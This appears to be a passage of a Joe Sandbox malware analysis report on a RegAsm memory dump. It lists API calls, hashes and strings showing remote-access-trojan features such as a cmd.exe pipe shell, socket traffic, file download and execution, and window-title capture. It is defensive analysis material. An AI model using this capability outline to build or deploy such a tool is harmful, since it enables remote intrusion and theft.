                                                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                  • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                  • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                  APIs
                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                  • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                  • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID:
                                                                                  • API String ID: 1818849710-0
                                                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: pQG
                                                                                  • API String ID: 176396367-3769108836
                                                                                  • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                  • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 1890195054-2766056989
                                                                                  • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                  • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                  • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                  • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00446227
                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                  • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocAllocate_free
                                                                                  • String ID:
                                                                                  • API String ID: 2447670028-0
                                                                                  • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                  • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                  • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                  • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEventStartupsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1953588214-0
                                                                                  • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                  • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                  • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                  • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                  • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$ForegroundText
                                                                                  • String ID:
                                                                                  • API String ID: 29597999-0
                                                                                  • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                  • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                  • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                  • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                  APIs
                                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                    • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                  • String ID:
                                                                                  • API String ID: 1170566393-0
                                                                                  • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                  • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                                  • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                  • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                  • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                  • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                  • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                  • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                                  • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                  • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                  • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                  • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                  • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                  APIs
                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Startup
                                                                                  • String ID:
                                                                                  • API String ID: 724789610-0
                                                                                  • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                  • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                  • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                  • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                  APIs
                                                                                  • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Deallocatestd::_
                                                                                  • String ID:
                                                                                  • API String ID: 1323251999-0
                                                                                  • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                  • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                  • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                  • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: recv
                                                                                  • String ID:
                                                                                  • API String ID: 1507349165-0
                                                                                  • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                  • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                  • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                  • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: send
                                                                                  • String ID:
                                                                                  • API String ID: 2809346765-0
                                                                                  • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                  • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                  • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                  • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                  • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                  • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                  • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                  • API String ID: 1067849700-181434739
                                                                                  • Opcode ID: ed7f3b93a997bf495bb2224270d1fa8215b74623d6d0b25d55c002b54669c783
                                                                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                  • Opcode Fuzzy Hash: ed7f3b93a997bf495bb2224270d1fa8215b74623d6d0b25d55c002b54669c783
                                                                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                  • API String ID: 2994406822-18413064
                                                                                  • Opcode ID: e14bed4ef01757ff4560f6724ab99566e0b98c53cede54a9e4545aac6ce31b27
                                                                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                  • Opcode Fuzzy Hash: e14bed4ef01757ff4560f6724ab99566e0b98c53cede54a9e4545aac6ce31b27
                                                                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
